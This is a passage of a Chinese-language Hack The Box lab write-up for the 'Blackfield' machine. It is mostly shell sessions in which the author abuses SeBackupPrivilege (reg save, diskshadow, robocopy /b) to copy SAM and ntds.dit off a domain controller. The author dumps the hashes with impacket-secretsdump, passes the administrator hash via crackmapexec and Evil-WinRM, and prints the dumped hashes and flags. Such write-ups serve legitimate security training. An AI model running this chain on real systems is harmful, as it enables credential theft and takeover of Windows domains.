Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents>

21、获取下第一个flag值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls


    Directory: C:\Users\svc_backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/28/2020   2:26 PM             32 user.txt


*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
3920bb317a0bef51027e2852be64b543
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>

0x02 系统权限获取

22、查看下当前用户权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>

23、SeBackUpPrivilege 基本上允许完整的系统读取。这是因为svc_backup位于 Backup Operators 组中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> net user svc_backup
User name                    svc_backup
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/23/2020 10:54:48 AM
Password expires             Never
Password changeable          2/24/2020 10:54:48 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/23/2020 11:03:50 AM

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc_backup\Desktop>

24、备份操作员是一个默认的 Windows 组,旨在使用某些方法来备份和恢复计算机上的文件,以读取和写入系统上的所有(或大多数)文件。我在 上找到了一个帖子how to dump the local SAM hashes by abusing the SeBackupPrivilege,可以 在这里找到;我将尝试相同的技术来查看是否可以转储哈希值:

1
2
3
4
5
6
首先,我使用以下两个命令从帖子中复制SAM和 的简单方法:SYSTEM

reg save hklm\sam c:\temp\sam

reg save hklm\system c:\temp\system
为了正确执行上述命令,我首先temp在驱动器中创建一个目录C:,然后运行命令:

24、按照提示,开始操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cd C:/
*Evil-WinRM* PS C:\> mkdir temp


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/15/2024   3:41 PM                temp


*Evil-WinRM* PS C:\> reg save hklm\sam c:\temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\> reg save hklm\system c:\temp\system
The operation completed successfully.

*Evil-WinRM* PS C:\> cd temp
*Evil-WinRM* PS C:\temp> ls


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/15/2024   3:41 PM          45056 sam
-a----        5/15/2024   3:41 PM       17580032 system


*Evil-WinRM* PS C:\temp> download sam
                                        
Info: Downloading C:\temp\sam to sam
                                        
Info: Download successful!
*Evil-WinRM* PS C:\temp> download system
                                        
Info: Downloading C:\temp\system to system
                                        
Info: Download successful!
*Evil-WinRM* PS C:\temp>

25、这里使用impacket-secretsdump进行转储密码

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-secretsdump -sam sam -system system LOCAL                                                
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

26、无法使用,密码不对

1
2
3
4
5
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.192 -u administrator -H 67ef902eae0d740df6257f273de75051
SMB         10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [-] BLACKFIELD.local\administrator:67ef902eae0d740df6257f273de75051

27、既然SAM哈希值不起作用,我将把焦点切换到该 ntds.dit 文件,因为该文件相当于本地 SAM 文件的域控制器。现在,读取该文件的一个好方法 是ntds.dit 使用 另一个 Microsoft 实用程序: diskshadow,因为我的 shell 不是交互式桌面,所以我想使用该scripting模式。它只需将 diskshadow 命令放入文件中,每行一个。 Pentestlab 博客有一个 很好的细分 ,其中包括有关使用 diskshadow.它的编写方式就好像您有管理员权限并且只需要处理访问文件一样,因此我的策略会略有不同。我将创建一个文件,使用VSS.我将能够从那里读取锁定在 c 中的文件。我直接在受害者计算机上使用以下命令来制作 diskshadow.txt 文件:

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
*Evil-WinRM* PS C:\temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> cat diskshadow.txt
set context persistent nowriters
add volume c: alias temp
create
expose %temp% z:
*Evil-WinRM* PS C:\temp>

28、创建 diskshadow.txt 文件后,我使用以下命令创建卷影副本并将其显示为 Z:\ 驱动器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
diskshadow.exe /s c:\temp\diskshadow.txt

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow


*Evil-WinRM* PS C:\temp> diskshadow.exe /s c:\temp\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  5/15/2024 3:55:33 PM

-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {240888e7-daaa-4d05-8afd-997cd31e52fc} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {5afccffd-0ca4-4497-ab22-da339b40a5eb} set as environment variable.

Querying all shadow copies with the shadow copy set ID {5afccffd-0ca4-4497-ab22-da339b40a5eb}

        * Shadow copy ID = {240888e7-daaa-4d05-8afd-997cd31e52fc}               %temp%
                - Shadow copy set: {5afccffd-0ca4-4497-ab22-da339b40a5eb}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 5/15/2024 3:55:34 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {240888e7-daaa-4d05-8afd-997cd31e52fc}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\temp>

29、我现在将移动到该ntds文件夹以检查上述命令是否有效:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
*Evil-WinRM* PS C:\temp> cd z:
*Evil-WinRM* PS z:\> cd windows
*Evil-WinRM* PS z:\windows> cd ntds
*Evil-WinRM* PS z:\windows\ntds> ls


    Directory: z:\windows\ntds


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/10/2023   6:05 PM           8192 edb.chk
-a----        5/15/2024   3:51 PM       10485760 edb.log
-a----        2/23/2020   9:41 AM       10485760 edb00004.log
-a----        2/23/2020   9:41 AM       10485760 edb00005.log
-a----        2/23/2020   3:13 AM       10485760 edbres00001.jrs
-a----        2/23/2020   3:13 AM       10485760 edbres00002.jrs
-a----        2/23/2020   9:41 AM       10485760 edbtmp.log
-a----        5/15/2024   2:00 PM       18874368 ntds.dit
-a----        5/15/2024   2:00 PM          16384 ntds.jfm
-a----        5/15/2024   2:00 PM         434176 temp.edb


*Evil-WinRM* PS z:\windows\ntds>

30、我能够移动到该ntds文件夹但无法查看ntds.dit.因此,我现在可以使用robocopyMicrosoft 的命令将备份ntds.dit文件移动到我的临时文件夹:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
*Evil-WinRM* PS z:\windows\ntds> robocopy /b .\ C:\temp NTDS.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Wednesday, May 15, 2024 3:57:09 PM
   Source : z:\windows\ntds\
     Dest : C:\temp\

    Files : NTDS.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    z:\windows\ntds\
            New File              18.0 m        ntds.dit

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   18.00 m   18.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00


   Speed :           299593142 Bytes/sec.
   Speed :           17142.857 MegaBytes/min.
   Ended : Wednesday, May 15, 2024 3:57:09 PM

*Evil-WinRM* PS z:\windows\ntds>

31、它表明它完成了复制,然后通过检查临时文件夹,我能够确认它已被复制。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS z:\windows\ntds> ls C:\temp


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/15/2024   3:55 PM            608 2024-05-15_15-55-34_DC01.cab
-a----        5/15/2024   3:53 PM             86 diskshadow.txt
-a----        5/15/2024   2:00 PM       18874368 ntds.dit
-a----        5/15/2024   3:41 PM          45056 sam
-a----        5/15/2024   3:41 PM       17580032 system


*Evil-WinRM* PS z:\windows\ntds> cd C:\temp
*Evil-WinRM* PS C:\temp>

32、获取文件后ntds.dit,我们还需要从注册表中获取 SYSTEM 文件,然后将这两个文件发送到我们的攻击者计算机以在本地转储。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS z:\windows\ntds> cd C:\temp
*Evil-WinRM* PS C:\temp> reg.exe save hklm\system C:\temp\system.bak
The operation completed successfully.

*Evil-WinRM* PS C:\temp> download ntds.dit
                                        
Info: Downloading C:\temp\ntds.dit to ntds.dit
                                        
Info: Download successful!
*Evil-WinRM* PS C:\temp> download system.bak
                                        
Info: Downloading C:\temp\system.bak to system.bak
                                        
Info: Download successful!
*Evil-WinRM* PS C:\temp>

33、然后,我们开始转储哈希密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-secretsdump  -ntds ntds.dit -system system.bak LOCAL > ntds-hashes.txt
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat ntds-hashes.txt                                                                                                  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
....................
BLACKFIELD.local\BLACKFIELD553715:1111:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
SRV-WEB$:aes256-cts-hmac-sha1-96:090ad36e547c20ff359787a27d452243ab3e9ef4b54595add458fbd265e6c103
SRV-WEB$:aes128-cts-hmac-sha1-96:063e5e2795292318208f411f8ce0797e
SRV-WEB$:des-cbc-md5:b580c4c2bc0b19d6
SRV-FILE$:aes256-cts-hmac-sha1-96:eae9659f47e401ba621fe838cc590494d13eb75f3140c366301222356a200f65
SRV-FILE$:aes128-cts-hmac-sha1-96:44da7f10383facd38df5713bc4259e69
SRV-FILE$:des-cbc-md5:f47cc238c1ce9791
SRV-EXCHANGE$:aes256-cts-hmac-sha1-96:04268f211f13d2f617f68ce89e795e360a01efb0bd1645e10853f4fdc3096a65
SRV-EXCHANGE$:aes128-cts-hmac-sha1-96:eb62e53de31dc30bcefe16e89289efff
SRV-EXCHANGE$:des-cbc-md5:f162aeb3da497aab
SRV-INTRANET$:aes256-cts-hmac-sha1-96:bc6ddf66d2027c2b9f4b921726d53032cad3e14efd5291c114f1ae76547be9a6
SRV-INTRANET$:aes128-cts-hmac-sha1-96:54416d5a7209a9bb741740834dddc7ad
SRV-INTRANET$:des-cbc-md5:4579ce9240895dae
[*] Cleaning up...

34、只筛选管理员密码

1
2
3
4
5
6
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat ntds-hashes.txt | grep Administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Administrator:aes256-cts-hmac-sha1-96:dbd84e6cf174af55675b4927ef9127a12aade143018c78fbbe568d394188f21f
Administrator:aes128-cts-hmac-sha1-96:8148b9b39b270c22aaa74476c63ef223
Administrator:des-cbc-md5:5d25a84ac8c229c1

35、验证密码是否可用

1
2
3
4
5
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee                                 
SMB         10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [+] BLACKFIELD.local\administrator:184fb5e5178480be64824d4cd53b99ee (Pwn3d!)

36、获取最终的flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/28/2020   4:36 PM            447 notes.txt
-a----        11/5/2020   8:38 PM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
4375a629c7c67c8e29db269060c955cb
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/255

打靶记
#shooting-range
Blackfield-htb-writeup
https://sh1yan.top/2024/05/16/Blackfield-htb-writeup/
作者
shiyan
发布于
2024年5月16日
许可协议